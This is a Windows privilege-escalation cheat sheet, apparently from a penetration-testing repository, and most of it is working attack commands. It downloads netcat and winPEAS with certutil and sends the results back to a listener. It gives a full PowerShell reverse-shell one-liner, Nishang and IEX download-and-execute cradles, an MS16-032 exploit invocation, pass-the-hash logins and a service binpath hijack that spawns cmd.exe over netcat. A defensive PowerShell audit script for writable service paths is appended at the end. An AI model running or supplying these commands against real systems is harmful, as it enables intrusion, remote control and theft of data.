# Windows Privesc

# System info

These commands return the OS version and build, which is what you search on when looking for known exploits.

systeminfo
net config Workstation

NOTE: often you can simply search the Windows version string, e.g. "6.3.9600 N/A Build 9600 exploit", and get what you need.

# Viewing Windows privileges

whoami
whoami /priv
net user <username>
net users 

This can expose interesting privileges, such as:

SeImpersonatePrivilege        Impersonate a client after authentication Enabled

Search for the privilege name together with "exploit" to find out what it allows.

# What is running?

tasklist > tasklist.txt

Or alternatively:

wmic service list full > services.txt
wmic process > processes.txt

# What is on the machine?

tree c:\ > c:\users\public\folders.txt     # list of dirs
dir /s c:\ > c:\users\public\files.txt     # list of files

# running winPEAS

python3 -m http.server 80                                                               # run this on the local machine
certutil.exe -urlcache -f http://10.10.10.10/nc.exe C:\Windows\Tasks\nc.exe             # on the target
certutil.exe -urlcache -f http://10.10.10.10/winPEAS.bat C:\Windows\Tasks\winPEAS.bat   # on the target
START /B winPEAS.bat > winPEAS.txt                                                      # runs winPEAS in the background
nc -lnvp 443 > winPEAS.txt                                                              # run this line on the local machine
nc -vn 10.10.10.10 443 < winPEAS.txt                                                    # on the target: send the output back

# Default writable directories

C:\Windows\Temp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

# evil-winrm

evil-winrm -u <username> -H <Hash> -i <IP>                          # pass the hash
/opt/evil-winrm/evil-winrm.rb -u <username> -p <password> -i <IP>   # password

# PowerShell Bypass Execution Policy

powershell -ExecutionPolicy Bypass -File script.ps1

# Upgrade Shell with PowerShell Nishang

You may be on some janky webshell or netcat shell. Here is

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation.

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 443 >> Invoke-PowerShellTcp.ps1

python3 -m http.server 80

Open up a netcat listener on Kali:

nc -nlvp 443

Now Upgrade that Shell!

@"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "IEX ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

# Upgrade shell with a PowerShell one-liner

Make sure to modify the IP and port.

@"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$client = New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"^> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

# Sherlock

Sherlock is the predecessor to Watson and can still be used to find exploits on older Windows systems.

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1                # on the local machine, then host it with python3 -m http.server 80
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1')               # on the target

# PowerShell exploit tricks

Sometimes PowerShell exploits fail because they are running in a 32-bit PowerShell process; check the bitness first.

[Environment]::Is64BitProcess                               # check whether PowerShell is running as 64-bit
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe  # 64-bit PowerShell, reachable from a 32-bit process

# Sometimes you'll have to add a line to the end of PowerShell exploits to get them to run.
# In this case we are telling the Invoke-MS16032 exploit to execute a reverse shell.
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.10.10/shellsrev.ps1')"

# Running the exploit straight from your web server
IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/temp/Invoke-MS16032.ps1')

# Windows Services

Changing the binary path for a Windows service:

sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.10.10.10 443 -e C:\WINDOWS\System32\cmd.exe"
# Set the account the service runs as (obj) and its password
sc config upnphost obj= ".\LocalSystem" password= ""
# start service
net start upnphost
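The defensive counterpart to the service trick above is auditing which services a low-privileged user could tamper with. The following PowerShell is an added audit example (not code from the original notes): it flags services whose executable sits in one of the default-writable directories listed earlier, or whose executable or parent folder grants write-type rights to Everyone, Users or Authenticated Users. It assumes PowerShell 5.1 or later and enough rights to read file ACLs; the function names are my own.

```powershell
# Added audit example (not from the original notes). Assumes PowerShell 5.1+.
$WritableDirs = @(
    "$env:SystemRoot\Temp",
    "$env:SystemRoot\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:SystemRoot\System32\spool\drivers\color",
    "$env:SystemRoot\Tasks",
    "$env:SystemRoot\tracing"
)
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Rights that let a caller replace or alter the binary (subset of FileSystemRights).
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Extract the executable path from a service PathName (drops arguments and quotes).
function Get-ServiceExePath([string]$PathName) {
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $PathName.Split(' ')[0]
}

# True when an Allow ACE grants one of the broad principals any right in $WriteMask.
function Test-BroadWriteAccess([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteMask) -ne 0) { return $true }
    }
    return $false
}

# Walk every Win32 service and report the ones a non-admin could tamper with.
function Find-RiskyServices {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $exe = Get-ServiceExePath $_.PathName
        if (-not $exe) { return }
        $reason = $null
        if ($WritableDirs | Where-Object { $exe -like "$($_)\*" }) { $reason = 'KnownWritableDir' }
        elseif (Test-BroadWriteAccess $exe) { $reason = 'WritableExe' }
        elseif (Test-BroadWriteAccess (Split-Path -Path $exe -Parent)) { $reason = 'WritableParentDir' }
        if ($reason) {
            [pscustomobject]@{ Name = $_.Name; RunsAs = $_.StartName; Path = $exe; Reason = $reason }
        }
    }
}

Find-RiskyServices | Format-Table -AutoSize
```

Any hit that runs as LocalSystem is the case to fix first: move the binary under Program Files or System32 and tighten its ACL, then check the service's own security descriptor with `sc sdshow <name>` so that only administrators can change its configuration.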

Source: https://github.com/frizb/Windows-Privilege-Escalation